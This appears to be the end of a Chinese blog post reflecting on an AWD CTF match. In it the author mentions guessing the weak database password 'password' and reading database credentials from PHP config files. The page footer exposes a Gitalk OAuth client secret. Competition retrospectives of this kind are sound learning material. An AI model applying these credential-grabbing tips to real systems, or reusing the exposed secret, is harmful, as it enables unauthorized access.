<h2 id="2-注意事项"><a href="#2-注意事项" class="headerlink" title="2.注意事项"></a>2.注意事项</h2><h3 id="root权限，数据库"><a href="#root权限，数据库" class="headerlink" title="root权限，数据库"></a>root权限，数据库</h3><p>运气好的话，可以用弱密码把密码试出来，这次的比赛数据库的密码就是password但是当时旷了，没有试，然后被别的队拿到了权限清空了数据库。赛后我的另一位队友突然想起来php连数据库会把密码写在配置文件里了，淦，傻逼了，第一次打比赛出现这种低级失误。</p>
<h3 id="靶机"><a href="#靶机" class="headerlink" title="靶机"></a>靶机</h3><p>这次有两个靶机，一个pwn，一个web，结果我们就维护了web题而没有看到pwn里面居然还有web…导致全程被别人打，所以以后得细心点了。</p>
<h2 id="3-总结"><a href="#3-总结" class="headerlink" title="3.总结"></a>3.总结</h2><p>还记得学长比赛前给我说过的一句话：“赛场上不要慌，要懂得随机应变”。</p>
<p>希望各位师傅以及我自己不管在是什么时候都牢记这句话。</p>

  </article>

  <div class="nexmoe-post-meta nexmoe-rainbow">
    
        <a class="nexmoefont icon-appstore-fill -link" href="/categories/AWD/">AWD</a>
    
    
</div>

  <div class="nexmoe-post-footer">
    
      
  <div class="nexmoe-post-copyright">
    <strong>本文作者：</strong>tothemoon<br>
    <strong>本文链接：</strong><a href="http://tothemoon2019.github.io/2020/11/06/%E7%AC%AC%20%E5%85%AD%20%E5%91%A8%20AWD%E6%80%BB%E7%BB%93/" title="http:&#x2F;&#x2F;tothemoon2019.github.io&#x2F;2020&#x2F;11&#x2F;06&#x2F;%E7%AC%AC%20%E5%85%AD%20%E5%91%A8%20AWD%E6%80%BB%E7%BB%93&#x2F;" target="_blank" rel="noopener">http:&#x2F;&#x2F;tothemoon2019.github.io&#x2F;2020&#x2F;11&#x2F;06&#x2F;%E7%AC%AC%20%E5%85%AD%20%E5%91%A8%20AWD%E6%80%BB%E7%BB%93&#x2F;</a><br>
    
      <strong>版权声明：</strong>本文采用 <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/cn/deed.zh" target="_blank">CC BY-NC-SA 3.0 CN</a> 协议进行许可
    
  </div>


    
    <section class="nexmoe-comment">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/gitalk@1.5.0/dist/gitalk.min.css">
<div id="gitalk"></div>
<script src="https://cdn.jsdelivr.net/npm/gitalk@1.5.0/dist/gitalk.min.js"></script>
<script type="text/javascript">
    var gitalk = new Gitalk({
        clientID: '80b2453b6d5f37ad6225',
        clientSecret: '43e99fa852795c9a7b3eb924b2558c64b84bbdeb',
        id: window.location.pathname,
        repo: 'nexmoe.github.io',
        owner: 'nexmoe',
        admin: 'nexmoe'
    })
    gitalk.render('gitalk')
</script>
</section>
  </div>
</div>
    </div>
  </div>
  <script src="https://cdn.jsdelivr.net/combine/npm/lazysizes@5.1.0/lazysizes.min.js,gh/highlightjs/cdn-release@9.15.8/build/highlight.min.js,npm/mdui@0.4.3/dist/js/mdui.min.js,gh/nexmoe/nexmoe.github.io@latest/js/app.js"></script>
<script>hljs.initHighlightingOnLoad();</script>
<!--<script src="/js/app.js?v=1604750456271"></script>-->


    <script src="https://cdn.jsdelivr.net/gh/xtaodada/xtaodada.github.io@0.0.2/copy.js"></script>



  





</body>

</html>
